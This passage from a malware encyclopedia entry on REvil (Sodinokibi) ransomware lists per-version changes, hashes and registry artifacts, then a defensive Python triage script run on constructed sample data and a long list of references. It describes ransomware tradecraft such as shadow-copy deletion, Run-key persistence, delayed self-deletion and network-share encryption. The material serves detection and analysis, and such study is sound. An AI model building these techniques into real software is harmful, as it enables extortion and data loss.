- Encodes stored shellcode
- Adds the -path argument; when it is given, REvil:
  - Does not wipe folders (even if wipe == true)
  - Does not set the desktop background
  - Does not contact the C2 server (even if net == true)
  - Encrypts files in the specified folder and drops the ransom note
- Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults
- Renames the registry values:
Previous value | New value |
---|---|
sub_key | pvg |
pk_key | sxsP |
sk_key | BDDC8 |
0_key | f7gVD7 |
rnd_ext | Xu7Nnkd |
stat | sMMnxpgk |
REvil 1.04
MD5: 6e3efb83299d800edf1624ecbc0665e7
SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d
SHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6
- Uses PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (on Windows XP or older it uses the original command executed in all previous REvil versions)
- Removes the folder wipe capability
- Changes the REvil registry root key to SOFTWARE\GitForWindows
- Renames the registry values:
Previous value | New value |
---|---|
pvg | QPM |
sxsP | cMtS |
BDDC8 | WGg7j |
f7gVD7 | zbhs8h |
Xu7Nnkd | H85TP10 |
sMMnxpgk | GCZg2PXD |
REvil v1.05
MD5: cfefcc2edc5c54c74b76e7d1d29e69b2
SHA1: 7423c57db390def08154b77e2b5e043d92d320c7
SHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea
- Adds a new 'arn' configuration key holding a boolean true/false value that controls whether persistence is set up
- Implements persistence via a registry Run value. The value data is the full path and filename of the currently running executable; the executable is never moved into a 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The value name is hard-coded as 'lNOWZyAWVv': SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv
- Before exiting, REvil schedules its own executable for deletion at the next reboot by calling MoveFileExW with a NULL destination and flags set to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks the persistence, however, because the executable referenced by the Run value no longer exists once the deletion has taken place.
- Renames the registry values:
Previous value | New value |
---|---|
QPM | tgE |
cMtS | 8K09 |
WGg7j | xMtNc |
zbhs8h | CTgE4a |
H85TP10 | oE5bZg0 |
GCZg2PXD | DC408Qp4 |
REvil v1.06
MD5: 65ff37973426c09b9ff95f354e62959e
SHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e
SHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e
- Updates the string decoding function, breaking existing YARA rules (likely in response to the analysts' earlier blog post)
- Modifies the handling of network file encryption: now explicitly passes every possible "Scope" constant to WNetOpenEnum when looking for files to encrypt, and changes the "Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY, which now includes things like mapped printers
- Changes the persistence registry value name from 'lNOWZyAWVv' to 'sNpEShi30R'
- Renames the registry values:
Previous value | New value |
---|---|
tgE | 73g |
8K09 | vTGj |
xMtNc | Q7PZe |
CTgE4a | BuCrIp |
oE5bZg0 | lcZd7OY |
DC408Qp4 | sLF86MWC |
REvil v1.07
MD5: ea4cae3d6d8150215a4d90593a4c30f2
SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e
SHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3
TBD
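The version notes above give three registry artifacts worth checking together during triage: the per-version root keys (SOFTWARE\recfg, SOFTWARE\QtProject\OrganizationDefaults, SOFTWARE\GitForWindows), the hard-coded Run value names from v1.05 and v1.06, and the v1.05 self-deletion via MoveFileExW with MOVEFILE_DELAY_UNTIL_REBOOT. Windows records that delayed deletion as a source path followed by an empty destination in the REG_MULTI_SZ value PendingFileRenameOperations under SYSTEM\CurrentControlSet\Control\Session Manager, so the contradiction the notes describe (a Run value pointing at a file queued for deletion) is directly observable. The script below is an added example written for this page, not code from Malpedia or from any of the referenced analyses; the registry contents it runs on are constructed sample data, and the function and finding names are the example's own. It takes the three inputs as plain Python values so it works on a live read with winreg or on values exported from an offline hive.

```python
"""Triage of REvil registry artifacts (added example; not Malpedia code).

Inputs are plain values so the same logic works on a live winreg read or
on an offline hive export:
  run_values       - {value name: command line} from ...\CurrentVersion\Run
  pending          - PendingFileRenameOperations as a list of strings
  software_subkeys - key paths present under HKLM/HKCU (e.g. "SOFTWARE\\recfg")
"""
from __future__ import annotations

# Root keys named in the REvil version notes (relative to HKLM or HKCU).
REVIL_ROOT_KEYS = {
    r"SOFTWARE\recfg",
    r"SOFTWARE\QtProject\OrganizationDefaults",
    r"SOFTWARE\GitForWindows",
}
# Hard-coded Run value names from v1.05 and v1.06.
REVIL_RUN_VALUE_NAMES = {"lNOWZyAWVv", "sNpEShi30R"}

RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
PENDING_KEY = r"SYSTEM\CurrentControlSet\Control\Session Manager"
PENDING_VALUE = "PendingFileRenameOperations"


def _strip_nt_prefix(path: str) -> str:
    """Drop the '!' (replace-existing) and '\\??\\' (NT namespace) prefixes."""
    if path.startswith("!"):
        path = path[1:]
    if path.startswith("\\??\\"):
        path = path[4:]
    return path


def parse_pending_renames(multi_sz: list[str]) -> list[tuple[str, str | None]]:
    """Decode PendingFileRenameOperations into (source, destination) pairs.

    Windows stores consecutive source/destination strings. An empty
    destination means "delete source at next boot", which is what
    MoveFileExW(src, NULL, MOVEFILE_DELAY_UNTIL_REBOOT) records.
    """
    pairs: list[tuple[str, str | None]] = []
    for i in range(0, len(multi_sz) - 1, 2):
        src = _strip_nt_prefix(multi_sz[i])
        dst = _strip_nt_prefix(multi_sz[i + 1]) or None
        pairs.append((src, dst))
    return pairs


def executable_of(command: str) -> str:
    """Return the program path from a Run value's command line, quoted or not."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(None, 1)[0] if command else ""


def triage(run_values: dict[str, str], pending: list[str],
           software_subkeys: set[str]) -> list[tuple[str, str]]:
    """Return (finding kind, detail) tuples for the REvil artifacts above."""
    findings: list[tuple[str, str]] = []
    scheduled_deletes = {
        src.casefold() for src, dst in parse_pending_renames(pending) if dst is None
    }
    for name, cmd in run_values.items():
        if name in REVIL_RUN_VALUE_NAMES:
            findings.append(("revil_run_value_name", name))
        exe = executable_of(cmd)
        # The v1.05 contradiction: persistence that points at a file queued for deletion.
        if exe.casefold() in scheduled_deletes:
            findings.append(("run_target_pending_delete", f"{name} -> {exe}"))
    for key in software_subkeys:
        if key in REVIL_ROOT_KEYS:
            findings.append(("revil_root_key", key))
    return findings


# Constructed sample input (not from a real host): one benign Run entry plus a
# v1.05-style REvil entry whose target is also queued for deletion at reboot,
# and an ordinary driver replace in the same pending-rename list.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "lNOWZyAWVv": r"C:\Users\alice\Downloads\invoice_2021.exe",
}
SAMPLE_PENDING = [
    r"\??\C:\Users\alice\Downloads\invoice_2021.exe", "",
    r"\??\C:\Windows\Temp\driver.tmp", r"!\??\C:\Windows\System32\drivers\vendor.sys",
]
SAMPLE_SOFTWARE_KEYS = {r"SOFTWARE\GitForWindows", r"SOFTWARE\Microsoft"}


def sample_findings() -> list[tuple[str, str]]:
    return triage(SAMPLE_RUN_VALUES, SAMPLE_PENDING, SAMPLE_SOFTWARE_KEYS)


if __name__ == "__main__":
    for kind, detail in sample_findings():
        print(f"{kind}: {detail}")
```

On a live Windows host the inputs come straight from the standard library: `winreg.QueryValueEx(key, "PendingFileRenameOperations")` returns the REG_MULTI_SZ as a Python list in the pair order the parser expects, and `winreg.EnumValue` over the Run key under both HKLM and HKCU gives the value name/command pairs. The "run_target_pending_delete" finding is the useful one on its own: it does not depend on the value names, which changed between v1.05 and v1.06 and can change again.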
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REvil (Windows).
Known Synonyms |
---|
Sodin |
Sodinokibi |
Internal MISP references
UUID e7698597-e0a9-4f4b-9920-09f5db225bd4
which can be used as unique global reference for REvil (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.revil - webarchive
- https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/ - webarchive
- https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/ - webarchive
- https://isc.sans.edu/diary/27012 - webarchive
- https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/ - webarchive
- https://home.treasury.gov/news/press-releases/jy0471 - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/ - webarchive
- https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/ - webarchive
- https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf - webarchive
- https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/ - webarchive
- https://asec.ahnlab.com/ko/19860/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html - webarchive
- https://www.connectwise.com/resources/revil-profile - webarchive
- https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/ - webarchive
- https://www.flashpoint-intel.com/blog/revil-disappears-again/ - webarchive
- https://www.kaseya.com/potential-attack-on-kaseya-vsa/ - webarchive
- https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422 - webarchive
- https://intel471.com/blog/changes-in-revil-ransomware-version-2-2 - webarchive
- https://www.secureworks.com/research/lv-ransomware - webarchive
- https://threatpost.com/ransomware-revil-sites-disappears/167745/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/ - webarchive
- https://blog.group-ib.com/REvil_RaaS - webarchive
- https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/ - webarchive
- https://www.bbc.com/news/technology-59297187 - webarchive
- https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo - webarchive
- https://ke-la.com/will-the-revils-story-finally-be-over/ - webarchive
- https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf - webarchive
- https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/ - webarchive
- https://threatintel.blog/OPBlueRaven-Part1/ - webarchive
- https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/ - webarchive
- https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/ - webarchive
- https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf - webarchive
- https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/ - webarchive
- https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics - webarchive
- https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/ - webarchive
- https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis - webarchive
- https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/ - webarchive
- https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/ - webarchive
- https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/ - webarchive
- https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/ - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/ - webarchive
- https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/ - webarchive
- https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/ - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/ - webarchive
- https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20 - webarchive
- https://twitter.com/svch0st/status/1411537562380816384 - webarchive
- https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/ - webarchive
- https://www.netskope.com/blog/netskope-threat-coverage-revil - webarchive
- https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities - webarchive
- https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/ - webarchive
- https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin - webarchive
- https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/ - webarchive
- https://twitter.com/SophosLabs/status/1413616952313004040?s=20 - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://hatching.io/blog/ransomware-part2 - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://twitter.com/fwosar/status/1411281334870368260 - webarchive
- https://www.grahamcluley.com/travelex-paid-ransom/ - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html - webarchive
- https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident - webarchive
- https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/ - webarchive
- https://www.secureworks.com/research/revil-sodinokibi-ransomware - webarchive
- https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain - webarchive
- https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs - webarchive
- https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter - webarchive
- https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/ - webarchive
- https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/ - webarchive
- https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/ - webarchive
- https://blog.amossys.fr/sodinokibi-malware-analysis.html - webarchive
- https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/ - webarchive
- https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-southfield - webarchive
- https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html - webarchive
- https://www.s-rminform.com/cyber-intelligence-briefing/exmatter-malware-levels-up - webarchive
- https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html - webarchive
- https://community.riskiq.com/article/3315064b - webarchive
- https://www.certego.net/en/news/malware-tales-sodinokibi/ - webarchive
- https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html - webarchive
- https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/ - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/ - webarchive
- https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/ - webarchive
- https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/ - webarchive
- https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/ - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html - webarchive
- https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload - webarchive
- https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/ - webarchive
- https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil - webarchive
- https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf - webarchive
- https://securelist.com/ransomware-world-in-2021/102169/ - webarchive
- https://www.kpn.com/security-blogs/Tracking-REvil.htm - webarchive
- https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process - webarchive
- https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html - webarchive
- https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend - webarchive
- https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus - webarchive
- https://unit42.paloaltonetworks.com/prometheus-ransomware/ - webarchive
- https://velzart.nl/blog/ransomeware/ - webarchive
- https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf - webarchive
- https://securelist.com/sodin-ransomware/91473/ - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://twitter.com/SyscallE/status/1411074271875670022 - webarchive
- https://twitter.com/SophosLabs/status/1412056467201462276 - webarchive
- https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment - webarchive
- https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights - webarchive
- https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/ - webarchive
- https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view - webarchive
- https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/ - webarchive
- https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html - webarchive
- https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/ - webarchive
- https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/ - webarchive
- https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti - webarchive
- https://twitter.com/LloydLabs/status/1411098844209819648 - webarchive
- https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f - webarchive
- https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/ - webarchive
- https://www.secureworks.com/blog/revil-the-gandcrab-connection - webarchive
- https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain - webarchive
- https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/ - webarchive
- https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html - webarchive
- https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom - webarchive
- https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit - webarchive
- https://redcanary.com/blog/uncompromised-kaseya/ - webarchive
- https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/ - webarchive
- https://www.bankinfosecurity.com/interviews/ransomware-files-episode-6-kaseya-revil-i-5045 - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/ - webarchive
- https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox - webarchive
- https://www.youtube.com/watch?v=tZVFMVm5GAk - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/ - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/ - webarchive
- https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom - webarchive
- https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/ - webarchive
- https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/ - webarchive
- https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html - webarchive
- https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses - webarchive
- https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/ - webarchive
- https://twitter.com/R3MRUM/status/1412064882623713283 - webarchive
- https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf - webarchive
- https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80 - webarchive
- https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004 - webarchive
- https://www.youtube.com/watch?v=P8o6GItci5w - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2 - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks - webarchive
- https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions - webarchive
- https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/ - webarchive
- https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/ - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/ - webarchive
- https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released - webarchive
- https://twitter.com/VK_Intel/status/1411066870350942213 - webarchive
- https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf - webarchive
- https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/ - webarchive
- https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling - webarchive
- https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/ - webarchive
- https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/ - webarchive
- https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf - webarchive
- https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/ - webarchive
- https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021 - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://unit42.paloaltonetworks.com/revil-threat-actors/ - webarchive
- https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states - webarchive
- https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ - webarchive
- https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/ - webarchive
- https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf - webarchive
- https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/ - webarchive
- https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya - webarchive
- https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20 - webarchive
- https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/ - webarchive
- https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b - webarchive
- https://twitter.com/resecurity_com/status/1412662343796813827 - webarchive
- https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf - webarchive
- https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged - webarchive
- https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/ - webarchive
- https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
